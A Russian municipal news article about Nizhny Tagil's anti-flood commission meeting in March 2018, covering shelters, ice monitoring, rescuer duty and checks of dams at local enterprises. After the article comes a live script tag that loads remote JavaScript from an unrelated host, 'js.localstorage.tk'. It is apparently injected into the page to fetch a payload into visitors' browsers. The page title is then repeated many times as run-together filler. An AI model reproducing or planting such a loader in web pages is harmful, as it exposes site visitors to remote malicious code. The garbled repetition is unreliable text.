Вы здесь

Противопаводковая комиссия в Нижнем Тагиле

27.03.2018 17:11

Глава Нижнего Тагила Сергей Носов провел совещание по вопросу готовности муниципального образования город Нижний Тагил к безаварийному пропуску весеннего паводка.
Совещание началось с минуты молчания. Тагильчане почтили память погибших во время пожара в городе Кемерово.
Затем руководители организаций, ответственных за эффективную работу гидротехнических сооружений, доложили мэру о текущих мероприятиях по подготовке к весеннему половодью. Начальник отдела гражданской защиты населения Андрей Мишин отметил, что при подготовке к паводку проведено 91 мероприятие, прошли специальное обучение 1469 тагильчан. На территории города на случай чрезвычайной ситуации подготовлен 31 пункт временного размещения с возможностью приема около восьми с половиной тысяч человек. В постоянном режиме осуществляется мониторинг состояния льда и снежного покрова. С 23 марта начат объезд плотин. В отдельных местах специалисты приступили к чернению льда. В первой декаде апреля планируется провести распиловку льда на реке Межевая Утка возле деревни Баронская. С пятого числа будет организовано постоянное дежурство спасателей.
По информации руководителей Водоканала-НТ, НТМК и ВГОК, проведены обследования гидротехнических сооружений. На предприятиях созданы аварийные бригады, произведен запас необходимых для предотвращения чрезвычайных ситуаций материалов, проведена ревизия техники и оборудования.
Мэр поручил вести постоянный мониторинг не только состояния льда, снега и температурного режима, но и уровня промерзания почвы, так как это может сказаться на скорости паводка. Управлению городским хозяйством он дал задание провести специальную информационную встречу с руководителями садоводческих товариществ, территория которых находится в зоне потенциального подтопления. Начальнику отдела гражданской защиты населения предстоит организовать постоянный сбор информации от жителей о текущем состоянии близлежащих водоемов.
Следующее совещание по пропуску весеннего паводка мэр наметил на середину апреля. По предложению руководства 9 отряда ФПС оно должно пройти с участием представителей Горноуральского городского округа и Верхней Салды.
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Противопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем ТагилеПротивопаводковая комиссия в Нижнем Тагиле